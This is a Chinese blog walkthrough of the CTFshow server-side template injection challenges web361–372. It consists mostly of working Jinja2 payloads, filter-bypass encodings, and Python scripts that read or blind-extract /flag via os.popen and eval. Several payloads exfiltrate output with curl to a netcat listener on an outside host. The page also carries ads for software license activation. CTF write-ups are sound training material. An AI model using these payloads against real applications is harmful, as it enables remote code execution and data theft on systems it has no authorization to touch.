CTFSHOW SSTI篇[通俗易懂]

CTFSHOW SSTI篇[通俗易懂]文章目录web361web362web363web364web365web366、367web368web369web370web371web372建议大家先看下笔者之前写的模板注入的文章web361payloadname={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__[‘popen’](‘cat/flag’).read()}}web362payload?name={{x.__init__.__glo

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

建议大家先看下笔者之前写的
模板注入的文章

web361

payload
name={
{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

web362

payload
?name={
{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}

web363

payload
?name={
{x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /flag').read()

web364

payload
?name={
{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}

cookie传值
Cookie:x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

web365

payload
?name={
{x.__init__.__globals__.__getitem__(request.cookies.x1).eval(request.cookies.x2)}}

cookie传值
Cookie:x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

web366、367

palyoad
?name={
{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}

cookie传值
Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

web368

简单解法

import requests
import string
url ='http://826c9e0c-29d3-44de-9689-9f94eec68f1b.chall.ctf.show/?name={%set aaa=(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4)%}{%print(aaa.open(request.cookies.x5).read())%}'
headers={ 
   'Cookie':'''x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=/flag'''}
r=requests.get(url,headers=headers)
print(r.text)

复杂解法(盲注)
payload

import requests
import string
url ='http://85302b44-c999-432c-8891-7ebdf703d6c0.chall.ctf.show/?name={%set aaa=(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4)%}{%if aaa.eval(request.cookies.x5)==request.cookies.x6%}1341{%endif%}'
s=string.digits+string.ascii_lowercase+"{-}"
flag=''
for i in range(1,43):
	print(i)
	for j in s:
		x=flag+j
		headers={ 
   'Cookie':'''x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=open('/flag').read({0});x6={1}'''.format(i,x)}
		r=requests.get(url,headers=headers)
		#print(r.text)
		if("1341" in r.text):
			flag=x
			print(flag)
			break

web369

简单解法

http://ec6b99bb-953a-4e28-8962-084bda49c739.chall.ctf.show/
?name=
{ 
   % set po=dict(po=a,p=a)|join%}
{ 
   % set a=(()|select|string|list)|attr(po)(24)%}
{ 
   % set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{ 
   % set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{ 
   % set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{ 
   % set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{ 
   % set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{ 
   % set chr=x.chr%}
{ 
   % set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
{ 
   %print(x.open(file).read())%}

复杂解法
方法1、读文件盲注

import requests
import string
def ccchr(s):
	t=''
	for i in range(len(s)):
		if i<len(s)-1:
			t+='chr('+str(ord(s[i]))+')%2b'
		else:
			t+='chr('+str(ord(s[i]))+')'
	return t
url ='''http://b134fd30-bddc-4302-8578-8005b96f73c2.chall.ctf.show/?name= {% set a=(()|select|string|list).pop(24)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%} {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chr=x.chr%} {% set cmd=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%} {% set cmd2='''

s=string.digits+string.ascii_lowercase+'{_-}'
flag=''
for i in range(1,50):
	print(i)
	for j in s:
		x=flag+j
		u=url+ccchr(x)+'%}'+'{% if x.open(cmd).read('+str(i)+')==cmd2%}'+'1341'+'{% endif%}'
		#print(u)
		r=requests.get(u)
		if("1341" in r.text):			
			flag=x
			print(flag)
			break

方法2、反弹flag
电脑开启监听 nc -lvp 4567

http://da9612ac-2b66-485d-8149-b76a1f03d22c.chall.ctf.show/?name=
{ 
   % set a=(()|select|string|list).pop(24)%}
{ 
   % set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{ 
   % set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{ 
   % set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{ 
   % set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{ 
   % set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{ 
   % set chr=x.chr%}
{ 
   % set cmd=
%}
{ 
   %if x.eval(cmd)%}
123
{ 
   %endif%}

cmd后面的值用脚本生成

s='__import__("os").popen("curl http://xxx:4567?p=`cat /flag`").read()'
def ccchr(s):
	t=''
	for i in range(len(s)):
		if i<len(s)-1:
			t+='chr('+str(ord(s[i]))+')%2b'
		else:
			t+='chr('+str(ord(s[i]))+')'
	return t

web370

简单的解法

http://bb03c844-9e63-4ee0-8659-fd30a88c63ff.chall.ctf.show/
?name=
{ 
% set c=(dict(e=a)|join|count)%}
{ 
% set cc=(dict(ee=a)|join|count)%}
{ 
% set ccc=(dict(eee=a)|join|count)%}
{ 
% set cccc=(dict(eeee=a)|join|count)%}
{ 
% set ccccccc=(dict(eeeeeee=a)|join|count)%}
{ 
% set cccccccc=(dict(eeeeeeee=a)|join|count)%}
{ 
% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{ 
% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{ 
% set coun=(cc~cccc)|int%}
{ 
% set po=dict(po=a,p=a)|join%}
{ 
% set a=(()|select|string|list)|attr(po)(coun)%}
{ 
% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{ 
% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{ 
% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{ 
% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{ 
% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{ 
% set chr=x.chr%}
{ 
% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}
{ 
%print(x.open(file).read())%}

暴躁的解法
payload

import requests
cmd='__import__("os").popen("curl http://xxx:4567?p=`cat /flag`").read()'
def fun1(s):
t=[]
for i in range(len(s)):
t.append(ord(s[i]))
k=''
t=list(set(t))
for i in t:
k+='{% set '+'e'*(t.index(i)+1)+'=dict('+'e'*i+'=a)|join|count%}\n'
return k
def fun2(s):
t=[]
for i in range(len(s)):
t.append(ord(s[i]))
t=list(set(t))
k=''
for i in range(len(s)):
if i<len(s)-1:
k+='chr('+'e'*(t.index(ord(s[i]))+1)+')%2b'
else:
k+='chr('+'e'*(t.index(ord(s[i]))+1)+')'
return k	
url ='http://68f8cbd4-f452-4d69-b382-81eafed22f3f.chall.ctf.show/?name='+fun1(cmd)+''' {% set coun=dict(eeeeeeeeeeeeeeeeeeeeeeee=a)|join|count%} {% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(coun)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%} {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chr=x.chr%} {% set cmd='''+fun2(cmd)+''' %} {%if x.eval(cmd)%} abc {%endif%} '''
print(url)

开启监听 nc -lvp 4567 等待反弹flag

web371

过滤了print

http://c8f74fd3-a05a-477c-bb97-10325b9ce77d.chall.ctf.show?name=
{ 
% set c=(t|count)%}
{ 
% set cc=(dict(e=a)|join|count)%}
{ 
% set ccc=(dict(ee=a)|join|count)%}
{ 
% set cccc=(dict(eee=a)|join|count)%}
{ 
% set ccccc=(dict(eeee=a)|join|count)%}
{ 
% set cccccc=(dict(eeeee=a)|join|count)%}
{ 
% set ccccccc=(dict(eeeeee=a)|join|count)%}
{ 
% set cccccccc=(dict(eeeeeee=a)|join|count)%}
{ 
% set ccccccccc=(dict(eeeeeeee=a)|join|count)%}
{ 
% set cccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{ 
% set ccccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{ 
% set cccccccccccc=(dict(eeeeeeeeeee=a)|join|count)%}
{ 
% set coun=(ccc~ccccc)|int%}
{ 
% set po=dict(po=a,p=a)|join%}
{ 
% set a=(()|select|string|list)|attr(po)(coun)%}
{ 
% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{ 
% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{ 
% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{ 
% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{ 
% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{ 
% set chr=x.chr%}
{ 
% set cmd=
%}
{ 
%if x.eval(cmd)%}
abc
{ 
%endif%}

cmd后面的内容由下面的代码生成

def aaa(t):
t='('+(int(t[:-1:])+1)*'c'+'~'+(int(t[-1])+1)*'c'+')|int'
return t
s='__import__("os").popen("curl http://xxx:4567?p=`cat /flag`").read()'
def ccchr(s):
t=''
for i in range(len(s)):
if i<len(s)-1:
t+='chr('+aaa(str(ord(s[i])))+')%2b'
else:
t+='chr('+aaa(str(ord(s[i])))+')'
return t
print(ccchr(s))

web372

过滤了count,可以用length替换

跟大佬交换了思路学到了可以用全角数字代替正常数字,大家可以自行探索了。。。。。。

半角转全角代码

def half2full(half):  
full = ''  
for ch in half:  
if ord(ch) in range(33, 127):  
ch = chr(ord(ch) + 0xfee0)  
elif ord(ch) == 32:  
ch = chr(0x3000)  
else:  
pass  
full += ch  
return full  
t=''
s="0123456789"
for i in s:
t+='\''+half2full(i)+'\','
print(t)
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/180160.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • Mysql—运行sql的小技巧

    本篇集中整理一下执行sql的小技巧,这种方式不仅带来了操作上的便捷,也可以保证数据可以数据的安全性。 1:查询数据(保证查询性能) 2:插入/更新/删除数据(保证数据安全)

  • wifi2.4频段怎么设置_怎么修改wifi频段

    wifi2.4频段怎么设置_怎么修改wifi频段在win10系统里,wifi一般会优先选择2.4g频段,一些公共wifi大家都挤在2.4g频段的话,会导致网络质量很大的下降,所以我们可以把wifi改成5hz首选频带,那么win10怎样将wifi变为支持5ghz频段呢,下面小编给大家分享win10将wifi改成5hz首选频带的方法。解决方法:1、点击win10操作系统上的开始菜单图标,在弹出的菜单中,点击设置。2、弹出设置窗口,在设置窗口界面中点…

    2022年10月20日
  • random函数的用法

    random函数的用法用法:1、random.random()随机生成(0,1)之间的浮点数2、random.randint(上限,下限)随机生成在范围之内的整数,两个参数分别表示上限和下限3、random.randrange(,,)在指定范围内,按指定基数递增的集合中获得一个随机数,有三个参数,前两个参数代表范围上限和下限,第三个参数是递增增量,不包括下限,包括上限使用方式如下:random.r…

  • Onenote插件,云扩容

    Onenote插件,云扩容目录1.onenote2.插件3.云空间扩容4.onenote教程这些博主找了好久,现在一步到胃。特发布这篇文章,为后来的人指路。onenote各系列,公众号“软件管家”,有365,2016-2021系列,可正常同步。插件onetastic,直接官网免费onenoteclipper同onenotegem珍,有16版的,亲测可用于365版本。复制这段内容打开「百度网盘」APP即可获取链接:https://pan.baidu.com/s/1DtWmSRQ3cy1S6upA6DLU

  • centos7上安装kafka教程「建议收藏」

    centos7上安装kafka教程「建议收藏」一、centos7安装java8去oracle官网下载:https://www.oracle.com/cn/java/technologies/javase/javase-jdk8-downloads.htmltar-zxvfjdk-8u281-linux-x64.tar.gzmkdir/usr/javamvjdk1.8.0_281/usr/java环境变量配置:打开/etc/profile配置文件vi/etc/profile在配置文件末尾添加如下配置:exportJAV

  • 极限的定义((δ ε X x n ∀ ∃表示的)7种极限存在情况和21种极限不存在的情况总结)

    极限的定义((δ ε X x n ∀ ∃表示的)7种极限存在情况和21种极限不存在的情况总结)极限极限存在的七种情况为:1数列的极限2趋近于x0的极限3趋近于x0+的极限4趋近于x0-的极限5趋近于无穷的极限6趋近于无穷大的极限7趋近于无穷小的极限δεXxn∀∃∞极限存在的定义limxn(n趋于无穷大)=a的定义;∀ε>0∃N∈N+当n>N时/xn-a/<εlimf(x)=a;(x趋于x0)∀ε>0∃δ>0当0</x-x0/<δ时/f(x)

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号